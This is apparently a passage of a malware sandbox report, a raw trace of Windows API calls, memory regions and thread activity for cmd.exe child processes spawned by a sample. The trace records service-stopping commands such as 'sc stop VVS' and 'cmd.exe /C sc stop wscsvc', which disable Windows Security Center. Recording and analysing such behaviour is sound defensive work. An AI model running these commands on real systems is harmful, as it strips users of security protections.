[0020.727] SetErrorMode (uMode=0x0) returned 0x0 [0020.727] SetErrorMode (uMode=0x1) returned 0x0 [0020.727] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e07f8, lpFilePart=0x33f358 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f358*="Desktop") returned 0x25 [0020.727] SetErrorMode (uMode=0x0) returned 0x1 [0020.727] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.727] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0020.855] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.856] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.856] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x33f0d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33f0d4) returned 0xffffffff [0020.857] GetLastError () returned 0x2 [0020.857] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x33f0d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33f0d4) returned 0xffffffff [0020.857] GetLastError () returned 0x2 [0020.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.857] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x33f0d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33f0d4) returned 0x3f3408 [0020.857] FindClose (in: hFindFile=0x3f3408 | out: hFindFile=0x3f3408) returned 1 [0020.857] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x33f0d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33f0d4) returned 0xffffffff [0020.857] GetLastError () returned 0x2 [0020.857] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x33f0d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33f0d4) returned 0x3f3408 [0020.858] FindClose (in: hFindFile=0x3f3408 | out: hFindFile=0x3f3408) returned 1 [0020.858] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0020.858] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0020.858] GetConsoleTitleW (in: lpConsoleTitle=0x33f5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.858] InitializeProcThreadAttributeList (in: lpAttributeList=0x33f454, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x33f51c | out: lpAttributeList=0x33f454, lpSize=0x33f51c) returned 1 [0020.858] UpdateProcThreadAttribute (in: lpAttributeList=0x33f454, dwFlags=0x0, Attribute=0x60001, lpValue=0x33f514, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x33f454, lpPreviousValue=0x0) returned 1 [0020.858] GetStartupInfoW (in: lpStartupInfo=0x33f410 | out: lpStartupInfo=0x33f410*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.858] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.859] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.859] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0020.861] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop VVS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x33f4b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop VVS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x33f4fc | out: lpCommandLine="sc stop VVS", lpProcessInformation=0x33f4fc*(hProcess=0x78, hThread=0x74, dwProcessId=0xb04, dwThreadId=0xb08)) returned 1 [0020.865] CloseHandle (hObject=0x74) returned 1 [0020.865] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.865] GetEnvironmentStringsW () returned 0x3f5ed8* [0020.865] FreeEnvironmentStringsW (penv=0x3f5ed8) returned 1 [0020.865] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.843] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x33f3f0 | out: lpExitCode=0x33f3f0*=0x424) returned 1 [0021.843] CloseHandle (hObject=0x78) returned 1 [0021.843] _vsnwprintf (in: _Buffer=0x33f538, _BufferCount=0x13, _Format="%08X", _ArgList=0x33f3fc | out: _Buffer="00000424") returned 8 [0021.843] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0021.843] GetEnvironmentStringsW () returned 0x3f4098* [0021.843] FreeEnvironmentStringsW (penv=0x3f4098) returned 1 [0021.843] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.843] GetEnvironmentStringsW () returned 0x3f4098* [0021.843] FreeEnvironmentStringsW (penv=0x3f4098) returned 1 [0021.843] DeleteProcThreadAttributeList (in: lpAttributeList=0x33f454 | out: lpAttributeList=0x33f454) [0021.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.843] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.844] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.844] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.844] SetConsoleInputExeNameW () returned 0x1 [0021.844] GetConsoleOutputCP () returned 0x1b5 [0021.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.844] exit (_Code=1060) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x65c81000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wscsvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 396 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 397 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 398 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 399 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 400 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 401 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 402 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 403 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 404 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 405 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 406 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 407 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 408 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 409 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 410 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 411 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 412 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 413 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 414 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 415 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 416 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 544 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 545 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 546 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 547 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 548 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 549 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 550 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 551 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 552 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 553 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 554 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 555 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 556 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 557 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 558 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 559 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 560 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 561 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 562 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 563 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 564 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 565 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 610 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 611 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 612 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 613 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 614 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 615 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 616 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 617 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 618 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 619 start_va = 0x1db0000 end_va = 0x20f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 652 start_va = 0x2100000 end_va = 0x23cefff entry_point = 0x2100000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 19 os_tid = 0xa2c [0020.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x41fbb4 | out: lpSystemTimeAsFileTime=0x41fbb4*(dwLowDateTime=0x13e8ba00, dwHighDateTime=0x1d35d7b)) [0020.626] GetCurrentProcessId () returned 0xa28 [0020.626] GetCurrentThreadId () returned 0xa2c [0020.626] GetTickCount () returned 0x1449d [0020.626] QueryPerformanceCounter (in: lpPerformanceCount=0x41fbac | out: lpPerformanceCount=0x41fbac*=322020921) returned 1 [0020.628] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0020.628] __set_app_type (_Type=0x1) [0020.628] __p__fmode () returned 0x76d831f4 [0020.628] __p__commode () returned 0x76d831fc [0020.629] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0020.629] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0020.629] GetCurrentThreadId () returned 0xa2c [0020.629] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa2c) returned 0x60 [0020.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.629] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0020.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.650] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.650] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x41fb44 | out: phkResult=0x41fb44*=0x0) returned 0x2 [0020.650] VirtualQuery (in: lpAddress=0x41fb7b, lpBuffer=0x41fb14, dwLength=0x1c | out: lpBuffer=0x41fb14*(BaseAddress=0x41f000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.650] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x41fb14, dwLength=0x1c | out: lpBuffer=0x41fb14*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.650] VirtualQuery (in: lpAddress=0x321000, lpBuffer=0x41fb14, dwLength=0x1c | out: lpBuffer=0x41fb14*(BaseAddress=0x321000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.650] VirtualQuery (in: lpAddress=0x323000, lpBuffer=0x41fb14, dwLength=0x1c | out: lpBuffer=0x41fb14*(BaseAddress=0x323000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.650] VirtualQuery (in: lpAddress=0x420000, lpBuffer=0x41fb14, dwLength=0x1c | out: lpBuffer=0x41fb14*(BaseAddress=0x420000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0020.650] GetConsoleOutputCP () returned 0x1b5 [0020.650] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.651] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0020.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.651] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0020.797] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.797] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.797] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.797] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0020.797] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.797] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.798] GetEnvironmentStringsW () returned 0x492018* [0020.798] FreeEnvironmentStringsW (penv=0x492018) returned 1 [0020.798] GetEnvironmentStringsW () returned 0x492018* [0020.798] FreeEnvironmentStringsW (penv=0x492018) returned 1 [0020.798] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41eab4 | out: phkResult=0x41eab4*=0x68) returned 0x0 [0020.798] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x0, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.798] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x1, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.798] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x1, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.798] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x0, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x40, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x4, lpData=0x41eac0*=0x40, lpcbData=0x41eab8*=0x4) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x40, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.799] RegCloseKey (hKey=0x68) returned 0x0 [0020.799] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41eab4 | out: phkResult=0x41eab4*=0x68) returned 0x0 [0020.799] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41eabc, lpData=0x41eac0, lpcbData=0x41eab8*=0x1000 | out: lpType=0x41eabc*=0x0, lpData=0x41eac0*=0x40, lpcbData=0x41eab8*=0x1000) returned 0x2 [0020.799] RegQueryValueExW (in: hKey=0x68, 